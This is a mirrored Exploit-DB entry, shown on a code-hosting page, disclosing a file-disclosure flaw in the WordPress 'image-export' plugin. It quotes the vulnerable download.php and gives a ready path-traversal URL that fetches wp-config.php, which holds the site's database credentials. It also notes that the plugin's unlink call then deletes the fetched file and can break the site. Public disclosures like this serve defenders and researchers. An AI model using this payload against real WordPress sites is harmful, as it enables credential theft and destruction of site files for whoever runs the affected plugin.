bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/39584.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

33 lines
No EOL
872 B
Text
Raw Blame History

# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
download.php file code:
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
$file = $_GET['file'];
header( 'Content-Type: application/zip' );
header( 'Content-Disposition: attachment; filename="' . $file . '"' );
readfile( $file );
unlink( $file );
exit;
}
?>
Proof of concept:
Note that because of the unlink, we potentially can destroy the wordpress core.
Simply add the get parameter file:
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
Found by AMAR^SHG (Shkupi Hackers Group)
Reference in a new issue View git blame Copy permalink